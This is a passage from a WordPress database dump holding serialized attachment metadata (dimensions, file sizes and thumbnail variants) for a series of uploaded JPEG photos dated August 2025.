(5463,1945,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:38:\"2025/08/LINE_ALBUM_12868_250813_46.jpg\";s:8:\"filesize\";i:412484;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_46-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16867;}s:5:\"large\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_46-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:128017;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_46-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8635;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_46-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:79725;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_46-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:240345;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_46-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20679;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5464,1946,'_wp_attached_file','2025/08/LINE_ALBUM_12868_250813_47.jpg'),
(5465,1946,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:38:\"2025/08/LINE_ALBUM_12868_250813_47.jpg\";s:8:\"filesize\";i:411698;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_47-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17928;}s:5:\"large\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_47-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:131022;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_47-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8942;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_47-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:82235;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_47-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:243060;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_47-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21892;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5466,1947,'_wp_attached_file','2025/08/LINE_ALBUM_12868_250813_45.jpg'),
(5467,1947,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:38:\"2025/08/LINE_ALBUM_12868_250813_45.jpg\";s:8:\"filesize\";i:381579;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_45-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15741;}s:5:\"large\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_45-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:121165;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_45-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8151;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_45-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:75598;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_45-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:226731;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_45-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19574;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5468,1948,'_wp_attached_file','2025/08/LINE_ALBUM_12868_250813_44.jpg'),
(5469,1949,'_wp_attached_file','2025/08/LINE_ALBUM_12868_250813_42.jpg'),
(5470,1949,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:38:\"2025/08/LINE_ALBUM_12868_250813_42.jpg\";s:8:\"filesize\";i:391903;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_42-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15289;}s:5:\"large\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_42-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:119428;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_42-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7946;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_42-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:73600;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_42-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:227657;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_42-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18999;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5471,1948,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:38:\"2025/08/LINE_ALBUM_12868_250813_44.jpg\";s:8:\"filesize\";i:394562;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_44-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15235;}s:5:\"large\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_44-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:119871;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_44-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8127;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_44-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:73820;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_44-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:228458;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_44-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18287;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5472,1950,'_wp_attached_file','2025/08/LINE_ALBUM_12868_250813_48.jpg'),
(5473,1950,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:38:\"2025/08/LINE_ALBUM_12868_250813_48.jpg\";s:8:\"filesize\";i:384341;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_48-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15921;}s:5:\"large\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_48-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:117881;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_48-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8275;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_48-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:73742;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_48-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:221153;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_48-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19235;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5474,1951,'_wp_attached_file','2025/08/LINE_ALBUM_12868_250813_43.jpg'),
(5475,1952,'_wp_attached_file','2025/08/LINE_ALBUM_12868_250813_41.jpg'),
(5476,1951,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:38:\"2025/08/LINE_ALBUM_12868_250813_43.jpg\";s:8:\"filesize\";i:382014;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_43-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14803;}s:5:\"large\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_43-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:115778;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_43-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7922;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_43-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:71538;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_43-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:221341;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_43-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18810;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5477,1952,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:38:\"2025/08/LINE_ALBUM_12868_250813_41.jpg\";s:8:\"filesize\";i:403560;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_41-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15207;}s:5:\"large\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_41-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:122191;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_41-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7604;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_41-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:75279;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_41-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:233451;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_41-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18666;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5478,1953,'_wp_attached_file','2025/08/LINE_ALBUM_12868_250813_40.jpg'),
(5479,1953,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:38:\"2025/08/LINE_ALBUM_12868_250813_40.jpg\";s:8:\"filesize\";i:404774;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_40-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15213;}s:5:\"large\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_40-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:122627;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_40-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7640;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_40-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:75222;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_40-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:233695;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_40-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18727;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5480,1954,'_wp_attached_file','2025/08/LINE_ALBUM_12868_250813_38.jpg'),
(5481,1954,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:38:\"2025/08/LINE_ALBUM_12868_250813_38.jpg\";s:8:\"filesize\";i:378607;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_38-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14691;}s:5:\"large\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_38-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:116633;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_38-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7654;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_38-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:71650;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_38-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:220962;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_38-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17888;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5482,1955,'_wp_attached_file','2025/08/LINE_ALBUM_12868_250813_39.jpg'),
(5483,1955,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:38:\"2025/08/LINE_ALBUM_12868_250813_39.jpg\";s:8:\"filesize\";i:419033;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_39-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15559;}s:5:\"large\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_39-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:126158;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_39-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7759;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_39-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:77013;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_39-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:241135;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_39-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18758;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5484,1956,'_wp_attached_file','2025/08/LINE_ALBUM_12868_250813_36.jpg'),
(5485,1956,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:38:\"2025/08/LINE_ALBUM_12868_250813_36.jpg\";s:8:\"filesize\";i:403688;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_36-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15295;}s:5:\"large\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_36-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:122112;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_36-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7700;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_36-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:75184;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_36-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:233154;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_36-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18932;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5486,1957,'_wp_attached_file','2025/08/LINE_ALBUM_12868_250813_35.jpg'),
(5487,1957,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:38:\"2025/08/LINE_ALBUM_12868_250813_35.jpg\";s:8:\"filesize\";i:397240;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_35-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15416;}s:5:\"large\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_35-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:120249;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_35-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7909;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_35-768x432.jpg\";s:5:\"width\";i:768;s:6:\"h